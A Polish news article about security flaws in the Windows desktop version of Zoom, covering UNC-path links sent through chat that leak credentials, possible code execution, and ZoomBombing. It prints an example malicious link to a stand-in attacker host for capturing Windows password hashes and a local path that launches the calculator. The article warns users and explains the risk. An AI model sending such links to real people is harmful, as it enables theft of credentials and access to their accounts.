Zoom - wykryto kolejne luki w oprogramowaniu

Przechodząca okres dużej popularności aplikacja Zoom okazuje się bardziej dziurawa, niż myślano. Wykryto kolejne exploity, zagrażające prywatności użytkowników.

Eksperci zajmujący się cyberbezpieczeństwem ostrzegają, że osoby korzystające z desktopowej wersji aplikacji Zoom mogą otrzymać złośliwy link, który umożliwi przestępcom wykradzenie hasła do e-maila. Jest to możliwe dzięki luce w oprogramowaniu. Kliknięcie w link przesłany poprzez czat programu pozwala osobie wysyłające na podejrzenie haseł do poczty oraz udostępnienie możliwości wejścia do skrzynki odbiorczej Microsoft Outlook oraz dokumentów Sharepoint zapisanych na dysku. Jest to o tyle groźne, że z Zoom korzystają firmy, jak i władze - na poniższym zdjęciu widzisz premiera Wielkiej Brytanii, Borisa Johnsona, komunikującego się za pośrednictwem tej aplikacji z wysokimi urzędnikami w administracji państwowej. Łatwo się domyślić, że dostanie się przez włamywaczy do skrzynki pocztowej lub dokumentów premiera jest bardzo poważnym zagrożeniem.

Zoom - wykryto kolejne luki w oprogramowaniu

Ale to nie wszystko. Zalecane jest także zwrócenie szczególnej uwagi na przesyłane poprzez Zoom linki, rozpoczynające się od \\. Na przykład rozmówca prześle taki linki:

\\attacker.computer.com\company_salary.xlsx

Jeśli klikniesz w niego, będzie mógł podejrzeć nazwę użytkownika systemu, nazwę domeny lub komputera, a także zaszyfrowane hasła. Hasła te można odtworzyć, zyskując w ten sposób dostęp do zainstalowanych na tym komputerze aplikacji Microsoft Exchange, Outlooka oraz Sharepoint. Ponadto w niektórych sytuacjach włamywacz może doprowadzić do zdalnego wykonania kodu, a co gorsze - przejąć i ponownie użyć tokenów umożliwiających dostęp do zasobów sieciowych. Matthew Hickey z zajmującej się cyberbezpieczeństwem firmy Hacker House, przetestował różnego rodzaju ataki na desktopową wersję Zoom. Wykrył wówczas m.in. wysokie ryzyko wykorzystania w aplikacji Universal Naming Convention (UNC, konwencja zapisu ścieżki do udziału sieciowego) w celu wykorzystania Uniform Resource Identifier do wstrzyknięcia złośliwego kodu lub wykorzystania do podejrzenia haseł dostępu niektórych mechanizmów systemu, np. NT Lan Manager. Na szczęście w tym ostatnim przypadku nowsze wersje systemów Windows są w stanie wykryć zagrożenie i ostrzec użytkownika przed próbą ich użycia, jednak samej kradzieży nie odnotują.

Jednym z przykładów zdalnego użycia kodu jest przesłanie linka aktywującego systemowy kalkulator:

\\127.0.0.1\C\Windows\System32\Calc.exe

Po wklejeniu linku do wyszukiwarki zobaczysz:

Zoom - wykryto kolejne luki w oprogramowaniu

Hickey podkreśla, że luki te występują tylko w wydaniu aplikacji na Windows. Efektem luk może być także wymuszone zapraszanie użytkowników do udziału w wideokonferencji - wyobraźmy sobie sytuację, w której podczas spotkania online zarządu firmy dołącza do niego nikomu nieznana osoba. Ryzyko tego może zostać zmniejszone przez stosowanie w sieciach firmowych filtrów blokujących dla portów wychodzących, które mogą być użyte w celu wykorzystania ataku. W edycjach dla użytkowników prywatnych tej funkcji nie ma. Większość domowych połączeń z internetem wymaga udostępnienia takich portów, co z kolei umożliwia wykorzystanie UNC.

FBI prowadzi śledztwo w sprawia ataków nazwanych ZoomBombing - nazwa ta obejmuje wykorzystywanie luk programu do wykradania adresów e-mail, zdjęć oraz dołączania do wideokonferencji. Zoom obiecuje jak najszybsze załatanie luk.

Źródło: IT News